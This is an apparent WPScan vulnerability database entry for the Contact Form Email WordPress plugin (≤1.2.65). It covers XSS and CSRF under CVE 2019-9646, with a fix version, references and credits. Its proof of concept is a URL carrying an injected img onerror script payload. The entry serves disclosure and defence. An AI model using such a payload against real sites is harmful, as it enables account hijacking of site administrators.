Contact Form Email <= 1.2.65 - Multiple Cross-Site Scripting (XSS) & CSRF



Proof of Concept
http://www.example.com/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='"><img+src%3Dx+onerror%3Dalert(1)>

Affects Plugin

fixed in version 1.2.66

References

CVE 2019-9646
URL https://lists.openwall.net/full-disclosure/2019/02/05/7
URL https://security-consulting.icu/blog/2019/02/wordpress-contact-form-email-xss-csrf/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Tim Coen
Submitter Ryan Dewhurst
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 7203
Verified No
WPVDB ID 9227

Timeline

Publicly Published 2019-02-05 (6 months ago)
Added 2019-03-11 (4 months ago)
Last Updated 2019-03-11 (4 months ago)